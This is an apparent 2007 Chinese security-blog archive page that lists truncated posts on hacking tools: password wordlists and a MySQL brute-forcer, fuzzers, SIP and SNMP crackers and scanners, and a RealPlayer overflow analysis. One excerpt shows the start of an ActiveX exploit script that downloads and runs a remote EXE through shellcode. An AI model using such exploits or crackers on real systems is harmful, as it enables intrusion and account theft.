2007年11月 的日志

crack password tools

2007/11/25 8:01 | 鬼仔 | 工具收集 | 消灭0回复

来源:amxku's blog

http://wordlist.sourceforge.net/
http://packetstorm.securify.com/Crackers/wordlists/words_spanish.g z
http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?sear chvalue=wordlist&type=archives&%5Bsearch%5D.x=17&%5Bsearch %5D.y=11

mysql
/* Simples Brutal Force para Mysql.
BruteForce in mysql
*/

#include
#include
#include
阅读全文 »

Fuzzers

2007/11/25 2:44 | 鬼仔 | 工具收集 | 消灭0回复

来源:zwell's blog

关键字(Keywords) : fuzzing, fuzz testing, fuzzer.

antiparser
antiparser is a fuzz testing and fault injection API. The purpose of antiparser is to provide an API that can be used to model network protocols and file formats by their composite data types. Once a model has been created, 阅读全文 »

Tags:

Encoder

2007/11/25 2:40 | 鬼仔 | 工具收集 | 消灭0回复

Name: encoder
Version: 1.0
Author: ZwelL
Date: 2007.10.30
Link: http://www.nosec.org/web/index.php?q=encoder
Download: encoder.exe

Support:
* BASE64
* URI
* MD4
* MD5-32
* SHA1
* SHA256
* SHA384
* SHA512
* CRC32

Tags:

sipNosec

2007/11/25 2:35 | 鬼仔 | 工具收集 | 消灭0回复

Name: sipNosec

Version: 1.0

Author: ZwelL

Date: 2007.8.12

Link: http://www.nosec.org/web/index.php?q=sipNosec

Download: sipNosec.exe

sipNosec is a SIP protocol login cracker that contains 2 components: sniffer and cracker. It is similar to sipcrack 阅读全文 »

Tags:

siprint

2007/11/25 2:31 | 鬼仔 | 工具收集 | 消灭0回复

Name: siprint
Version: 1.1
Author: ZwelL
Date: 2007.7.8
Link: http://www.nosec.org/web/index.php?q=siprint
Download: siprint.exe signatures.txt

Today I officially released the siprint tool to the wide public. As the name show : siprint 阅读全文 »

Tags:

SnmpDigger–SNMP客户端程序

2007/11/24 12:41 | 鬼仔 | 工具收集 | 消灭0回复

作者:zwell
来源:zwell's blog

昨天与同事聊起了SNMP协议的一些东西。就随手做了个SNMP的客户端。

事实上在一些渗透测试过程中,通过SNMP是能够做很多事情的,简单的来说信息泄露一般都存在,运气好的话还能来个“拒绝服务”。

之前用的一些商用版的,存在版权问题,现在自己做了一个,用的很顺手,以后有需要再加吧 ;)
Name: SnmpDigger
Version: 0.2
Author: ZwelL
Date: 2007.11.23
Link: http://www.nosec.org/web/index.php?q=snmpdigger
Download: snmpdigger_bin.rar
阅读全文 »

Tags: ,

联众ConnectAndEnterRoom ActiveX控件栈溢出漏洞(exp)

2007/11/24 5:32 | 鬼仔 | 工具收集 | 消灭0回复

鬼仔注:又见联众

来源:vbs空间

exeurl = InputBox( "请输入下载执行exe的地址:", "输入","http://np.icehack.com/np.exe" )
'code by NetPatch
if exeurl <> "" then
code="\xe9\xf3\x00\x00\x00\x90\x90\x90\x90\x5a\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x8b\xd8\x8b\x73\x3c\x8b\x74\x1e\x78\x03\xf3\x8 阅读全文 »

Tags: , , ,

RealPlayer 6.0.10 到 6.0.14 整数溢出分析

2007/11/24 4:47 | 鬼仔 | 技术文章 | 消灭0回复

作 者: dummy
时 间: 2007-11-23,00:10
链 接: http://bbs.pediy.com/showthread.php?t=55357

RealPlayer 6.0.10 到 6.0.14 整数溢出分析

今天早上茄子就告诉我 cnbeta 被挂马了,使用最近出现的各种漏洞。
其中比较有意思的是,一个脚本中使用没有见过的 realplayer 溢出。

先从 realplayer 目录 rpplugins\ierpplug.dll 中的 IIERPCtl.Import 开始讲起,
下面是其声明
HRESULT Import(
[in] BSTR file,
阅读全文 »

Tags: